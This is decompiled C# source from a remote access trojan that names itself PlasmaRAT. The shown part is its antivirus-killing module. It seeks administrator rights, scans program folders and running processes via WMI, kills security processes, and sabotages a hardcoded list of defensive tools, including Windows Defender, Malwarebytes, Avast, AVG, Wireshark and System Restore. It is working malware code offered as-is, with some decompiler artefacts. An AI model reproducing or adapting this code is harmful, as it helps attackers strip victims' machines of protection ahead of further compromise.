// Token: 0x0600004E RID: 78 RVA: 0x00005508 File Offset: 0x00003708
public static bool CheckProcess(string location)
{
bool result;
try
{
string[] array = Strings.Split(AVKill.SearchStrings, " ", -1, CompareMethod.Binary);
string text = Strings.StrConv(location.ToString(), VbStrConv.Lowercase, 0);
foreach (string value in array)
{
try
{
if (text.Contains(value))
{
AVKill.FuckFileName(location.ToString());
BotKillers.KillFile(location.ToString());
result = true;
break;
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex2)
{
}
return(result);
}
// Token: 0x0600004B RID: 75 RVA: 0x00005120 File Offset: 0x00003320
public static void Start()
{
try
{
if (!AntiEverything.IsAdmin())
{
CheckAV.RunAVAdminMode();
}
else
{
AVKill.searchav(Environment.GetEnvironmentVariable("PROGRAMDATA"));
AVKill.ProtectMyFile();
AVKill.searchav(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles));
AVKill.AVProcSearcher();
AVKill.FuckFileName("rstrui.exe");
AVKill.FuckFileName("AvastSvc.exe");
AVKill.FuckFileName("avconfig.exe");
AVKill.FuckFileName("AvastUI.exe");
AVKill.FuckFileName("avscan.exe");
AVKill.FuckFileName("instup.exe");
AVKill.FuckFileName("mbam.exe");
AVKill.FuckFileName("mbamgui.exe");
AVKill.FuckFileName("mbampt.exe");
AVKill.FuckFileName("mbamscheduler.exe");
AVKill.FuckFileName("mbamservice.exe");
AVKill.FuckFileName("hijackthis.exe");
AVKill.FuckFileName("spybotsd.exe");
AVKill.FuckFileName("ccuac.exe");
AVKill.FuckFileName("avcenter.exe");
AVKill.FuckFileName("avguard.exe");
AVKill.FuckFileName("avgnt.exe");
AVKill.FuckFileName("avgui.exe");
AVKill.FuckFileName("avgcsrvx.exe");
AVKill.FuckFileName("avgidsagent.exe");
AVKill.FuckFileName("avgrsx.exe");
AVKill.FuckFileName("avgwdsvc.exe");
AVKill.FuckFileName("egui.exe");
AVKill.FuckFileName("zlclient.exe");
AVKill.FuckFileName("bdagent.exe");
AVKill.FuckFileName("keyscrambler.exe");
AVKill.FuckFileName("avp.exe");
AVKill.FuckFileName("wireshark.exe");
AVKill.FuckFileName("ComboFix.exe");
AVKill.FuckFileName("MSASCui.exe");
AVKill.FuckFileName("MpCmdRun.exe");
AVKill.FuckFileName("msseces.exe");
AVKill.FuckFileName("MsMpEng.exe");
AVKill.FuckFileName("blindman.exe");
AVKill.FuckFileName("SDFiles.exe");
AVKill.FuckFileName("SDMain.exe");
AVKill.FuckFileName("SDWinSec.exe");
}
}
catch (Exception ex)
{
}
}
// Token: 0x0600004F RID: 79 RVA: 0x000055B0 File Offset: 0x000037B0
public static void AVProcSearcher()
{
try
{
string value = "Program Files";
try
{
foreach (object obj in ((IEnumerable)NewLateBinding.LateGet(Interaction.GetObject("winmgmts:", null), null, "ExecQuery", new object[]
{
"Select * from Win32_Process"
}, null, null, null)))
{
object objectValue = RuntimeHelpers.GetObjectValue(obj);
if ((NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains(value) | NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null).ToString().Contains("ProgramData")) && !NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString().Contains(PlasmaRAT.InstallationOfEverything) && Operators.CompareString(NewLateBinding.LateGet(objectValue, null, "executablepath", new object[0], null, null, null).ToString(), Application.ExecutablePath, false) != 0)
{
try
{
try
{
if (AVKill.CheckProcess(Conversions.ToString(NewLateBinding.LateGet(objectValue, null, "ExecutablePath", new object[0], null, null, null))))
{
Process.GetProcessById(Conversions.ToInteger(NewLateBinding.LateGet(objectValue, null, "ProcessID", new object[0], null, null, null))).Kill();
}
}
catch (Exception ex)
{
}
}
catch (Exception ex2)
{
}
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
{
(enumerator as IDisposable).Dispose();
}
}
}
catch (Exception ex3)
{
}
}
// Token: 0x0600004A RID: 74 RVA: 0x0000508C File Offset: 0x0000328C
private static void FileSystemWatcher1_Created(object sender, FileSystemEventArgs e)
{
int num;
int num4;
object obj;
try
{
IL_00:
ProjectData.ClearProjectError();
num = 1;
IL_07:
int num2 = 2;
AVKill.CheckFileforAV(e.FullPath);
IL_14:
goto IL_6F;
IL_16:
int num3 = num4 + 1;
num4 = 0;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num3);
IL_30:
goto IL_64;
IL_32:
num4 = num2;
@switch(ICSharpCode.Decompiler.ILAst.ILLabel[], num);
IL_42 :;
}
catch when(endfilter(obj is Exception & num != 0 & num4 == 0))
{
Exception ex = (Exception)obj2;
goto IL_32;
}
IL_64:
throw ProjectData.CreateProjectError(-2146828237);
IL_6F:
if (num4 != 0)
{
ProjectData.ClearProjectError();
}
}
